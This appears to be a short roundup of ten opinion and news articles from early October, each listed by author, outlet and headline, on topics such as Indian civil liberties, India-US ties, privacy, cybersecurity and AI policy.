  • [Oct 5] PV Navaneethakrishnan, The Hindu, Why no takers? (for ME/M.Tech programmes).
  • [Oct 6] Aakar Patel, Times of India blog, Cases against PC, letter-writing celebs show liberties are at risk.
  • [Oct 6] Suhasini Haidar, The Hindu, Explained: How will purchases from Russia affect India-US ties?
  • [Oct 6] Sumit Chakraberty, Livemint, Evolution of business models in the era of privacy by design.
  • [Oct 6] Spy’s Eye, Outlook, Insider threat management.
  • [Oct 6] Roger Marshall, Deccan Herald, Big oil, Big Data and the shape of water.
  • [Oct 6] Neil Chatterjee, Fortune, The power grid is evolving. Cybersecurity must too.
  • [Oct 7] Scott W Pink, Mondaq.com, EU: What is GDPR and CCPA and how does it impact blockchain?
  • [Oct 7] GN Devy, The Telegraph, Has India slid into an irreversible Talibanization of the mind?
  • [Oct 7] Susan Ariel Aaronson, South China Morning Post, The Trump administration’s approach to AI is not that smart: it’s about cooperation, not domination.